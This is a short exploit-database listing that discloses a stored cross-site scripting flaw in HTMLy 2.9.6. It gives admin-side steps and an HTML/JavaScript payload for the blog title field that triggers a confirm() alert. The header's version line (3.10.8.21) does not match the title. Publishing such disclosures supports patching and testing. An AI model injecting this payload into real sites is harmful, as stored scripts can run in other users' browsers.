Lucene search

K
packetstormTmrswrrPACKETSTORM:177980
HistoryApr 08, 2024 - 12:00 a.m.

HTMLy 2.9.6 Cross Site Scripting

2024-04-0800:00:00
tmrswrr
packetstormsecurity.com
159
exploit
stored xss
htmly
2.9.6
cross site scripting
admin login
general setting
blog title
xss alert

AI Score

7.4

Confidence

Low

`# Exploit Title: HTMLy Version : 2.9.6 - Stored XSS  
# Exploit Author: tmrswrr   
# Vendor Homepage: https://www.htmly.com/  
# Version 3.10.8.21   
# Date : 04/08/2024  
  
1 ) Login admin https://127.0.0.1/HTMLy/admin/config  
2 ) General Setting > Blog title > "><img src=x onerrora=confirm() onerror=confirm(1)>   
3 ) After save it you will be see xss alert  
  
`

AI Score

7.4

Confidence

Low